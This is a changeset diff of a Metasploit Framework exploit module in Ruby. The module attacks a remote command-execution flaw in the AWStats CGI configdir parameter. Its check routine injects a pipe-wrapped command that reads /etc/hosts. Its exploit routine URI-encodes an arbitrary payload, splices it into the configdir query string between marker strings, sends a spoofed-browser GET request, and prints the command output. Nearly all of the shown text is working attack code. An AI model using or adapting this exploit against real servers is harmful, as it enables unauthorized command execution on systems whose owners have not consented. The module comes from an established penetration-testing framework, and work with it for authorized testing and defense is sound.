Changeset 5187
- Timestamp:
- 10/30/07 08:22:46 (9 months ago)
- Files:
Legend:
- Unmodified
- Added
- Removed
- Modified
- Copied
- Moved
framework3/trunk/modules/exploits/unix/webapp/awstats_configdir_exec.rb
r4529 r5187 4 4 5 5 ## 6 # This file is part of the Metasploit Framework and may be subject to 6 # This file is part of the Metasploit Framework and may be subject to 7 7 # redistribution and commercial restrictions. Please see the Metasploit 8 8 # Framework web site for more information on licensing and terms of use. … … 17 17 class Exploits::Unix::Webapp::AWStats_ConfigDir_Execution < Msf::Exploit::Remote 18 18 19 include Exploit::Remote::Tcp20 19 include Exploit::Remote::HttpClient 21 20 22 21 def initialize(info = {}) 23 super(update_info(info, 22 super(update_info(info, 24 23 'Name' => 'AWStats configdir Remote Command Execution', 25 24 'Description' => %q{ 26 25 This module exploits an arbitrary command execution vulnerability in the 27 AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.228 are vulnerable.26 AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 27 are vulnerable. 29 28 }, 30 29 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ], … … 49 48 'Targets' => [[ 'Automatic', { }]], 50 49 'DisclosureDate' => 'Jan 15 2005', 51 'DefaultTarget' => 0))52 50 'DefaultTarget' => 0)) 51 53 52 register_options( 54 53 [ … … 60 59 res = send_request_cgi({ 61 60 'uri' => datastore['URI'], 62 'vars_get' => 61 'vars_get' => 63 62 { 64 63 'configdir' => '|echo;cat /etc/hosts;echo|' 65 64 } 66 65 }, 25) 67 66 68 67 if (res and res.body.match(/localhost/)) 69 68 return Exploit::CheckCode::Vulnerable 70 69 end 71 70 72 71 return Exploit::CheckCode::Safe 73 72 end 74 75 73 76 74 def exploit 77 res = send_request_cgi({ 78 'uri' => datastore['URI'], 79 'vars_get' => 75 command = Rex::Text.uri_encode(payload.encoded) 76 urlconfigdir = datastore['URI'] + "?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|" 77 78 res = send_request_raw({ 79 'uri' => urlconfigdir, 80 'method' => 'GET', 81 'headers' => 80 82 { 81 'configdir' => %Q!|echo 'YYY'; #{payload.encoded}; echo 'YYY'|! 83 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 84 'Connection' => 'Close', 82 85 } 83 86 }, 25) 84 87 85 88 if (res) 86 89 print_status("The server returned: #{res.code} #{res.message}") 87 print("") 88 89 m = res.body.match(/YYY(.*)YYY/) 90 90 91 m = res.body.match(/YYY\n(.*)\nYYY/m) 92 91 93 if (m) 92 94 print_status("Command output from the server:") 93 print( m[1])95 print("\n" + m[1] + "\n\n") 94 96 else 95 97 print_status("This server may not be vulnerable") 96 98 end 97 98 99 else 99 100 print_status("No response from the server") 100 101 end 101 102 end 102 103 103 104 end 104 end 105 end 106
